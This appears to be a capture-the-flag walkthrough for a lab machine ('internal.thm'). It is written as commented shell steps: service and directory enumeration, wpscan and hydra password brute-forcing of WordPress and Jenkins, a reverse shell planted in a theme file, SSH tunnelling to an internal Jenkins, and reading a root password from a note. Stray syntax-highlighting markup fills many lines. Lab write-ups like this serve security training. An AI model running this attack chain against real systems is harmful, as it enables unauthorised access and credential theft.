1606070;"># Step 1: Add hosts entry
2echo 606070;">#a5d6ff;">"TARGET_IP internal.thm" >> /etc/hosts
3
4606070;"># Step 2: Enumeration
5nmap -sV internal.thm
6606070;"># 22 SSH, 80 HTTP
7
8gobuster dir -u http:606070;">//internal.thm -w /usr/share/wordlists/dirb/common.txt
9606070;"># Found: /blog (WordPress), /phpmyadmin
10
11606070;"># Step 3: WordPress Exploitation
12wpscan --url http:606070;">//internal.thm/blog --enumerate u
13606070;"># Found: admin
14
15wpscan --url http:606070;">//internal.thm/blog --usernames admin --passwords /usr/share/wordlists/rockyou.txt
16606070;"># Credentials found!
17
18606070;"># Login, edit theme 404.php with reverse shell
19
20606070;"># Step 4: Initial Shell
21nc -lvnp 4444
22606070;"># Trigger 404.php - shell as www-data
23
24606070;"># Step 5: Internal Enumeration
25cat /opt/wp-save.txt
26606070;"># Found: aubreanna credentials!
27
28su aubreanna
29606070;"># or SSH
30cat /home/aubreanna/user.txt
31
32cat /home/aubreanna/jenkins.txt
33606070;"># Jenkins on 172.17.0.2:8080 (internal Docker!)
34
35606070;"># Step 6: SSH Tunneling
36606070;"># On your machine:
37ssh -L 8080:172.17.0.2:8080 aubreanna@internal.thm
38
39606070;"># Access http://localhost:8080 (Jenkins!)
40
41606070;"># Step 7: Jenkins Exploitation
42606070;"># Brute force Jenkins login
43hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost -s 8080 http-post-form 606070;">#a5d6ff;">"/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:Invalid"
44
45606070;"># Login to Jenkins
46606070;"># Manage Jenkins > Script Console
47606070;"># Groovy reverse shell
48
49606070;"># Step 8: Root Access
50606070;"># Jenkins shell reveals root credentials in /opt/note.txt
51cat /opt/note.txt
52606070;"># root:tr0ub13guM!@#123
53
54ssh root@internal.thm